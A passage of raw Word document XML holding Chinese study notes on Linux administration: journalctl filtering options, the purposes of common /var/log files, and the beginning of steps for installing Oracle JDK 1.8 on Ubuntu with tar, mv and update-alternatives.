        </w:rPr>
        <w:t>试图通过用于记录</w:t>
      </w:r>
      <w:r w:rsidRPr="00E457FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>所有内核</w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供一个集中管理解决方案，以解决这些问题，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E457FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>并用户级进程</w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集和管理这些日志的系统称为日志。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103DD8CC" w14:textId="77777777" w:rsidR="008428BC" w:rsidRDefault="008428BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36BBBD17" w14:textId="2CE635CD" w:rsidR="00C21CCC" w:rsidRDefault="00CD0ED9" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:hanging="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常查看系统日志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>journalctl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AAC12F" w14:textId="77777777" w:rsidR="00D50019" w:rsidRDefault="00D50019" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:hanging="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662B0DDA" w14:textId="6738D1C4" w:rsidR="00CD0ED9" w:rsidRDefault="00413BB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不带任何选项</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>时，默认输出</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>所有的日志记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D43447" w14:textId="77777777" w:rsidR="00D50019" w:rsidRDefault="00D50019" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7151A349" w14:textId="5824E168" w:rsidR="00413BB7" w:rsidRPr="00D50019" w:rsidRDefault="00413BB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>journalctl -n [num]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D201DD" w14:textId="63F20E8B" w:rsidR="00CD0ED9" w:rsidRPr="00C21CCC" w:rsidRDefault="00413BB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>显示最后</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>num</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>行的日志，如果省略</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>num,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>则默认显示最后</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FE0745" w14:textId="35DEB31E" w:rsidR="00C12908" w:rsidRDefault="00C12908" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B8A4CA2" w14:textId="185020C4" w:rsidR="007541E2" w:rsidRPr="00C3795E" w:rsidRDefault="007541E2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3795E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>journalctl -b -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5505C5A2" w14:textId="1B79CD24" w:rsidR="007541E2" w:rsidRDefault="007541E2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C3795E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>看上次启动后的日志信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0507C727" w14:textId="77777777" w:rsidR="007541E2" w:rsidRDefault="007541E2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46B62481" w14:textId="18D7E752" w:rsidR="00E91DF5" w:rsidRDefault="00E91DF5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>journalctl -u &lt;unit_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C88AFF9" w14:textId="7FD15A6D" w:rsidR="00413BB7" w:rsidRDefault="00E91DF5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的日志，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unit_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为具体的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果想合并显示多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志可以用多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-u &lt;unit_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D86F91E" w14:textId="04F4D20D" w:rsidR="00751987" w:rsidRDefault="00751987" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00751987">
        <w:t>journalctl -u nginx.service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DD9E15" w14:textId="77777777" w:rsidR="00413BB7" w:rsidRPr="00C21CCC" w:rsidRDefault="00413BB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DCE8F21" w14:textId="126A08CD" w:rsidR="00C21CCC" w:rsidRDefault="001C78A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>journalctl --since=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2020-08-31 10:00:00</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2020</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>点以后的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51931F3F" w14:textId="0DBED72A" w:rsidR="00A914EA" w:rsidRDefault="00056D66" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00056D66">
        <w:t>journalctl --since=yesterday --until=today</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8CBFC5" w14:textId="248E1508" w:rsidR="00A914EA" w:rsidRDefault="00102B54" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00102B54">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>journalctl --since today/yesterday #</w:t>
      </w:r>
      <w:r w:rsidRPr="00102B54">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示今天</w:t>
      </w:r>
      <w:r w:rsidRPr="00102B54">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00102B54">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>昨天以来的日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D06B0A8" w14:textId="14B3FE84" w:rsidR="00A914EA" w:rsidRDefault="00A914EA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C968FE6" w14:textId="7D075DC1" w:rsidR="00102B54" w:rsidRDefault="00102B54" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>journalctl _PID=28655</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5837CD7E" w14:textId="471B4A8A" w:rsidR="00A914EA" w:rsidRDefault="00102B54" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取指定进程的日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279E7534" w14:textId="3C88F9B5" w:rsidR="00C21CCC" w:rsidRDefault="00C21CCC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE0770F" w14:textId="63C30EBD" w:rsidR="007E0C95" w:rsidRDefault="007E0C95" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="242" w:name="_Toc159779702"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>var/log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="242"/>
    </w:p>
    <w:p w14:paraId="752E57EF" w14:textId="77777777" w:rsidR="007E0C95" w:rsidRDefault="007E0C95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A70C52" w14:textId="77777777" w:rsidR="007E0C95" w:rsidRDefault="007E0C95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统启动后的信息和错误日志，是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Red Hat Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中最常用的日志之一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D905645" w14:textId="77777777" w:rsidR="007E0C95" w:rsidRDefault="007E0C95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/secure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与安全相关的日志信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154A5C8D" w14:textId="77777777" w:rsidR="007E0C95" w:rsidRDefault="007E0C95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/maillog </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与邮件相关的日志信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CD4BA3" w14:textId="77777777" w:rsidR="007E0C95" w:rsidRDefault="007E0C95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与定时任务相关的日志信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDB91D1" w14:textId="77777777" w:rsidR="007E0C95" w:rsidRDefault="007E0C95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/spooler </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UUCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>news</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设备相关的日志信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0875E475" w14:textId="77777777" w:rsidR="007E0C95" w:rsidRDefault="007E0C95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/boot.log </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>守护进程启动和停止相关的日志消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6466AD21" w14:textId="2DCA14B4" w:rsidR="00C21CCC" w:rsidRDefault="007E0C95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/wtmp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该日志文件永久记录每个用户登录、注销及系统的启动、停机的事件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D52A47" w14:textId="7CC3A448" w:rsidR="00102B54" w:rsidRDefault="00102B54" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78824AB9" w14:textId="77777777" w:rsidR="00102B54" w:rsidRDefault="00102B54" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67393713" w14:textId="4E3570EF" w:rsidR="00C12908" w:rsidRDefault="00C12908" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="243" w:name="_Toc159779703"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jdk</w:t>
      </w:r>
      <w:r>
        <w:t>1.8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="243"/>
    </w:p>
    <w:p w14:paraId="17F83661" w14:textId="4C3D2A6A" w:rsidR="00C12908" w:rsidRDefault="00C12908" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61911247" w14:textId="41EC2254" w:rsidR="0068456E" w:rsidRDefault="0068456E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0068456E">
        <w:t>https://juejin.cn/s/ubuntu%2022.04%20install%20oracle%20java%208</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEDD1ED" w14:textId="0DD0326F" w:rsidR="0068456E" w:rsidRDefault="00C3350E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9A6448" w14:textId="211D7E2C" w:rsidR="0068456E" w:rsidRDefault="00C3350E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C3350E">
        <w:t>https://download.oracle.com/otn/java/jdk/8u202-b08/1961070e4c9b4e26a04e7f5a083f551e/jdk-8u202-linux-x64.tar.gz?AuthParam=1679024120_3f930ccb4b624a538f10ad6174efa09d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67361842" w14:textId="072B73BE" w:rsidR="0068456E" w:rsidRDefault="0068456E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="505B15D8" w14:textId="77777777" w:rsidR="00326222" w:rsidRDefault="00326222" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004F5788">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>解压文件：在下载文件所在目录中，使用以下命令解压文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2903E1F8" w14:textId="32E2F179" w:rsidR="00C3350E" w:rsidRDefault="00326222" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>tar xvzf jdk-8uversion-linux-x64.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D771F5" w14:textId="0AD2E725" w:rsidR="00C3350E" w:rsidRDefault="00C3350E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485D25DD" w14:textId="77777777" w:rsidR="00326222" w:rsidRDefault="00326222" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004F5788">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>移动文件：使用以下命令将解压后的文件移动到</w:t>
      </w:r>
      <w:r w:rsidRPr="004F5788">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/lib/jvm </w:t>
      </w:r>
      <w:r w:rsidRPr="004F5788">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>目录中：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FA3288" w14:textId="388258DE" w:rsidR="00326222" w:rsidRDefault="00326222" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>sudo mv jdk1.8.0_version /usr/lib/jvm/jdk1.8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012886D1" w14:textId="0AC8AC83" w:rsidR="00326222" w:rsidRDefault="00326222" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B2C6DC" w14:textId="77777777" w:rsidR="00DA2E29" w:rsidRDefault="00DA2E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004F5788">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>设置环境变量：使用以下命令设置</w:t>
      </w:r>
      <w:r w:rsidRPr="004F5788">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r w:rsidRPr="004F5788">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>环境变量：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7083AB61" w14:textId="77777777" w:rsidR="00DA2E29" w:rsidRDefault="00DA2E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0/bin/java" 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065290B1" w14:textId="77777777" w:rsidR="00DA2E29" w:rsidRDefault="00DA2E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0/bin/javac" 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288591DF" w14:textId="77777777" w:rsidR="00DA2E29" w:rsidRDefault="00DA2E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0/bin/java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8ED3FD" w14:textId="2739DB00" w:rsidR="00326222" w:rsidRDefault="00DA2E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0/bin/javac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C729E24" w14:textId="7193514F" w:rsidR="00326222" w:rsidRDefault="00326222" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D4D812" w14:textId="77777777" w:rsidR="004F5788" w:rsidRDefault="004F5788" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004F5788">
